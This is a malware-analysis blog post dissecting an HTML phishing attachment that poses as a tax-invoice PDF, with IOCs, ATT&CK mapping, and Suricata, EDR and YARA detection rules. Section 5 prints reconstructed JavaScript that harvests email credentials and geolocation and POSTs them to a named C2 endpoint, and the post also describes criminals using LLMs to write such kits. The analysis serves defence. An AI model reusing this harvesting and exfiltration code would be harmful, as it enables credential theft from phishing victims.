description: "Deep-dive reverse engineering analysis of a sophisticated HTML-based credential harvester spoofing a corporate domain with only 1/26 AV detection."
⚠️ Threat Level: HIGH | Detection Rate: 3% (1/26) | Type: Credential Harvester + Geo-IP Exfiltration
Executive Summary
On April 29, 2026, a targeted phishing email was received purportedly from accnt@hackteam.red — a lookalike domain spoofing a legitimate corporate identity. The attachment, named Tax Invoice PDF.SHTML, is a highly obfuscated HTML file masquerading as a PDF document. When opened in a browser, it harvests email credentials and geolocation data, exfiltrating them to a command-and-control (C2) server with minimal antivirus detection.
This article provides a full technical teardown of the sample, its behavioral indicators, network infrastructure, and defensive recommendations.
1. Attack Chain Overview
[Email Delivery] → [Social Engineering] → [HTML Execution] → [Credential Harvesting] → [Geo-IP Collection] → [C2 Exfiltration] → [Delayed Redirect]
| Stage | Description |
|---|---|
| Delivery | Spearphishing email with .SHTML attachment |
| Pretext | "Tax invoice due for payment" — urgency-based social engineering |
| Execution | User opens file → browser renders fake login page |
| Harvesting | Form captures email + password |
| Reconnaissance |
ip-api.com lookup for geolocation enrichment |
| Exfiltration | POST to premiumpriests4owo.site/report.php
|
| Evasion | Redirect to Google static image to mask compromise |
2. Sample Metadata
Filename: Tax Invoice PDF.SHTML
Size: 18 KiB
MIME Type: text/html
SHA256: 15383c1b855341a0bc4975f2f3ed299bc6abf13a3e6e48b05ca3371dd7068dfc
AV Detection: 1/26 (3%) — Avira: PHISH/HTML.Agent.ENJ
Entropy: 5.42 (high — indicates script obfuscation)
First Seen: 2026-05-01 07:57:37 UTC
Why the Low Detection Rate?
Traditional AV engines excel at signature-based detection of binary malware (PE files, DLLs). This sample is pure HTML + JavaScript — a "fileless" threat that executes entirely within the browser sandbox. Without a malicious binary payload, most static scanners return clean results. The high entropy (5.42) confirms obfuscated JavaScript, but entropy alone is rarely sufficient for detection without behavioral analysis.
AI-Assisted Threat Generation: A New Paradigm
The source code of this phishing kit reveals a disturbing evolution in cybercrime tooling: the hybrid human-AI attack model. While the malicious intent is unmistakably human, the implementation carries distinct fingerprints of large language model (LLM) assistance.
Hallmarks of LLM-Generated Code
1. Prompt Leakage in Comments
The JavaScript contains comments that appear to be direct echoes of the operator's prompts:
// Instead of Telegram, form data + location + attempt counter are sent as standard POST
// (x-www-form-urlencoded) to a PHP server endpoint.
// All CSS and functionality remain identical.
The phrase "All CSS and functionality remain identical" is characteristic of prompt engineering residue — instructions given to the LLM that were preserved verbatim in the output rather than being interpreted as meta-directives.
2. Structural Comment Patterns
The code is organized with GPT-style section separators:
// ---------- PHP ENDPOINT CONFIGURATION ----------
// ---------- PRESERVE ALL ORIGINAL VARIABLES & LOGIC ----------
This ALL-CAPS header pattern with ASCII dividers is a known artifact of ChatGPT/Claude code generation, where the model uses visual structure to organize complex refactors.
3. Over-Engineered Abstractions
For a simple credential exfiltration task, the code implements unnecessarily complex patterns:
function sendToPhpServer(...) {
return new Promise((resolve, reject) => {
const xhr = new XMLHttpRequest();
xhr.onload = function() { resolve(); };
xhr.onerror = function() { resolve(); }; // Silent failure
});
}
The Promise wrapper around synchronous XHR, combined with graceful degradation to resolve() even on error, reflects the LLM's training bias toward "safe" code that doesn't break — even when failure should be noisy.
4. Defensive Coding Without Purpose
The LLM inserted explanatory justifications for obvious choices:
// Set content type to standard form encoding (NOT JSON)
This self-justifying comment is typical of AI outputs trained to explain reasoning, even when the reasoning is trivial.
Human Operator Fingerprints
Despite AI assistance, the operator left unmistakably human traces:
| Artifact | Evidence | Significance |
|---|---|---|
| Yoruba variable names |
oruko (name), kokoro (heart/password) |
Suggests West African operator origin — consistent with known BEC clusters |
| Typographic errors |
"Securty serices" in footer |
LLMs rarely misspell visible UI text; human copy-paste or manual editing |
| C2 hardcoding | Plaintext endpoint in source | Human operational decision, not AI-generated |
| Logic quirks |
countAttempt >= 2 before redirect |
Crude human-implemented anti-analysis/delay tactic |
The Democratization Threat
This sample illustrates a critical inflection point: AI has lowered the technical barrier for cybercrime to near zero. The operator did not need to understand JavaScript closures, CORS policies, or XHR internals — only how to phrase a prompt. Yet the resulting code is sufficiently obfuscated (entropy 5.42), sufficiently functional (active C2 exfiltration), and sufficiently evasive (1/26 AV detection) to pose a real threat.
Key Insight: The future of phishing is not skilled coders writing malware. It is unskilled operators directing skilled AI, with human expertise reserved only for infrastructure (domains, hosting, mule accounts) and social engineering (pretexting, target selection).
Defensive Implications
| Traditional Assumption | New Reality |
|---|---|
| Poor grammar = amateur threat | AI generates flawless copy; errors may be intentional or human-overridden |
| Complex code = sophisticated actor | AI produces complex code; sophistication is in the prompt, not the operator |
| Static signatures work | AI-generated variants have high structural diversity, low signature stability |
| Code analysis reveals author skill | Hybrid code requires attribution triage: separate AI artifacts from human fingerprints |
For defenders, this means shifting from code-centric detection to behavior-centric detection: the C2 domain, the exfiltration pattern, and the social engineering pretext remain human-controlled and detectable, even when the implementation is AI-generated.
3. Email Analysis
Headers & Social Engineering
From: Account <accnt@hackteam.red>
To: b0x@hackteam.red
Date: 29 Apr 2026, 21:29 UTC
Subject: [Implied] Tax Invoice
Key Psychological Triggers:
-
Domain spoofing:
hackteam.redmimics a legitimate corporate domain - Authority impersonation: Sender name "Account" implies financial department
- Urgency: "due for payment at the end of this month"
- Curiosity gap: "Use your email password to access the Tax document" — this is the critical red flag; no legitimate PDF requires an email password
4. Behavioral Analysis (Sandbox Telemetry)
Analysis performed via Hybrid Analysis Falcon Sandbox. The sample triggered 29 indicators mapped to 21 MITRE ATT&CK techniques across 8 tactics.
4.1 Process Execution
# Primary execution
msedge.exe -- "file:///C:/TaxInvoicePDF.SHTML.html"
# Child processes spawned (standard Edge browser behavior)
msedge.exe --type=renderer
msedge.exe --type=gpu-process
msedge.exe --type=utility --utility-sub-type=network.mojom.NetworkService
identity_helper.exe --type=utility
Note: The file opens directly in the browser via file:// protocol — no external server required for initial execution. This makes it highly portable and dangerous even in air-gapped preview scenarios.
4.2 Network Indicators
| Domain / IP | Purpose | Risk |
|---|---|---|
ip-api.com |
Geo-IP lookup (country, region, city, ISP, IP) | Reconnaissance |
premiumpriests4owo.site |
C2 server — credential exfiltration | MALICIOUS |
i.imgur.com/6lOn9d7.png |
Likely decoy image / branding asset | Legitimate abused |
encrypted-tbn0.gstatic.com |
Post-exfiltration redirect destination | Legitimate abused |
4.3 MITRE ATT&CK Mapping
| Technique | ID | Context |
|---|---|---|
| Spearphishing Attachment | T1566.001 | Email with .SHTML attachment |
| Drive-by Compromise | T1189 | Browser execution of malicious HTML |
| System Location Discovery | T1016 |
ip-api.com JSON query |
| Exfiltration Over C2 | T1041 | POST to report.php
|
| Obfuscated Files | T1027.006 | High entropy JS (5.42) |
| Input Capture | T1056.004 | Password field harvesting |
| Application Layer Protocol | T1071.001 | HTTP/HTTPS C2 communication |
| Data Encoding | T1132.001 | Base64 artifacts in requests |
5. Reverse Engineering: Script Deconstruction
Based on sandbox memory extraction and pattern matching, the embedded JavaScript follows this logical flow:
// ============================================
// Phase 1: Geolocation Reconnaissance
// ============================================
fetch('http://ip-api.com/json/?fields=status,message,country,regionName,city,isp,query')
.then(response => response.json())
.then(geoData => {
if (geoData.status === 'success') {
locationData = {
country: geoData.country || 'Unknown',
state: geoData.regionName || 'Unknown',
city: geoData.city || 'Unknown',
isp: geoData.isp || 'Unknown',
ip: geoData.query || 'Unknown'
};
}
});
// ============================================
// Phase 2: Credential Harvesting Form
// ============================================
/*
Rendered HTML structure (inferred):
<form method="post" id="authForm">
<input type="email" placeholder="email" name="oruko">
<input type="password" placeholder="Enter password" name="...">
<button type="submit">Access Document</button>
</form>
<div id="errorMsg">Invalid credentials</div>
*/
document.getElementById('authForm').addEventListener('submit', function(e) {
e.preventDefault(); // Prevent actual form submission
const formEmail = document.querySelector('[name="oruko"]').value;
const formPassword = document.querySelector('[type="password"]').value;
// ============================================
// Phase 3: Data Exfiltration
// ============================================
const xhr = new XMLHttpRequest();
const PHP_ENDPOINT = 'https://premiumpriests4owo.site/report.php';
xhr.open('POST', PHP_ENDPOINT, true);
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
const params = new URLSearchParams();
params.append('oruko', formEmail); // "oruko" = Yoruba for "name"
params.append('...', formPassword); // [obfuscated key]
params.append('geo', JSON.stringify(locationData));
xhr.send(params.toString());
// ============================================
// Phase 4: Evasion — Delayed Redirect
// ============================================
setTimeout(() => {
window.location.href = 'https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQaUwWuDNV0h2gvKH5z1fKZ2B05YVGNhfKgCg&s';
}, 2000); // 2-second delay to mask data transmission
});
Notable Obfuscation Techniques
-
High Entropy Strings: Character sequences like
y."sZ"(andJ+zXsuggest Base64 or custom encoding layers -
Legitimate Service Abuse: Using
ip-api.com(free geo-IP API) andi.imgur.com(image hosting) blends malicious traffic with benign patterns -
Variable Naming: The use of
oruko(Yoruba language) may indicate operator origin or intentional anti-analysis confusion -
Delayed Redirect: The
setTimeoutredirect to a Google static image creates a plausible "loading" experience while data transmits in background
6. Infrastructure Analysis
C2 Domain: premiumpriests4owo.site
-
TLD:
.site— commonly abused for cheap, disposable infrastructure -
Naming convention: Nonsensical dictionary words + random suffix (
4owo) — algorithmically generated domain (DGA-like pattern) -
Endpoint:
/report.php— standard PHP data collection script - Protocol: HTTPS (TLS 1.2) — encrypts exfiltration in transit
Abuse of Legitimate Services
| Service | Abuse Vector | Detection Evasion |
|---|---|---|
ip-api.com |
Free geolocation API | No malicious infrastructure needed |
i.imgur.com |
Image hosting for decoy assets | Trusted domain in corporate allowlists |
googleapis.com |
Chrome Web Store verification (legitimate Edge behavior) | Blends with normal browser traffic |
7. Detection & Defensive Strategies
7.1 Network-Level Detection
# Suricata / Snort Signatures
alert http any any -> any any (
msg:"PHISHING HTML Credential Exfiltration - ip-api.com + form POST";
content:"ip-api.com"; http_uri;
content:"password"; http_client_body;
content:"email"; http_client_body;
classtype:trojan-activity;
sid:1000001; rev:1;
)
alert http any any -> any any (
msg:"SUSPICIOUS POST to .site domain with credential data";
content:"POST"; http_method;
content:".site/"; http_uri;
pcre:"/(password|passwd|pwd|email|oruko)/i";
classtype:trojan-activity;
sid:1000002; rev:1;
)
7.2 Email Security Policies
| Policy | Implementation |
|---|---|
| Attachment Blocking | Quarantine .shtml, .html, .htm attachments from external senders |
| Double Extension Detection | Flag *.PDF.* patterns — PDFs don't need secondary extensions |
| DMARC Enforcement |
p=reject for hackteam.red to prevent spoofing |
| User Training | "No PDF requires your email password" — golden rule |
7.3 Endpoint Detection (EDR/XDR)
# Behavioral Indicator
Process: msedge.exe | chrome.exe | firefox.exe
CommandLine contains: "file:///" AND "*.html" AND ("ip-api.com" OR "ipapi.co")
Action: Alert + Isolate
# File System Indicator
FileWrite: *.SHTML, *.HTML with entropy > 5.0 AND contains "password" OR "type="password""
Action: Quarantine + Hash submission
7.4 YARA Rule
rule HTML_Credential_Harvester_Generic {
meta:
description = "Detects HTML-based credential phishing with geo-IP and exfiltration"
author = "ThreatIntel Analyst"
date = "2026-05-01"
hash = "15383c1b855341a0bc4975f2f3ed299bc6abf13a3e6e48b05ca3371dd7068dfc"
strings:
$geo1 = "ip-api.com" ascii wide
$geo2 = "ipapi.co" ascii wide
$form1 = "type="password"" ascii wide
$form2 = "placeholder="Enter password"" ascii wide
$exfil1 = "XMLHttpRequest" ascii wide
$exfil2 = "URLSearchParams" ascii wide
$exfil3 = "application/x-www-form-urlencoded" ascii wide
$redirect1 = "setTimeout" ascii wide
$redirect2 = "window.location.href" ascii wide
condition:
filesize < 50KB and
(uint16(0) == 0x3c21 or uint16(0) == 0x3c68) and // HTML signature <! or <h
1 of ($geo*) and
1 of ($form*) and
1 of ($exfil*) and
1 of ($redirect*)
}
8. IOC Summary
| Type | Indicator | Confidence |
|---|---|---|
| File Hash | 15383c1b855341a0bc4975f2f3ed299bc6abf13a3e6e48b05ca3371dd7068dfc |
Confirmed |
| C2 Domain | premiumpriests4owo.site |
Malicious |
| C2 URL | https://premiumpriests4owo.site/report.php |
Malicious |
| Geo-IP API | http://ip-api.com/json/ |
Abused |
| Decoy Image | https://i.imgur.com/6lOn9d7.png |
Abused |
| Redirect Target | https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQaUwWuDNV0h2gvKH5z1fKZ2B05YVGNhfKgCg&s |
Abused |
| Sender | accnt@hackteam.red |
Spoofed |
9. Lessons Learned
- Fileless threats bypass traditional AV: HTML/JS phishing requires behavioral analysis, not just signatures
-
Legitimate services are weaponized:
ip-api.com,imgur.com,googleapis.comprovide cover for malicious activity -
Double extensions still work:
PDF.SHTMLexploits user trust in PDFs while executing HTML - Low detection ≠ low risk: 1/26 AV detection is a feature, not a bug — the threat is real and active
- User awareness is the last line of defense: Technical controls failed; the user who questions "Why does a PDF need my password?" stops the chain
10. References
- Hybrid Analysis Report
- MITRE ATT&CK Framework
- Avira Threat Encyclopedia: PHISH/HTML.Agent
- ip-api.com Documentation
Analysis conducted May 1, 2026. Indicators are shared for defensive purposes. If you encounter similar samples, submit to your threat intelligence platform and update detection rules.
Stay vigilant. Trust but verify.
Top comments (0)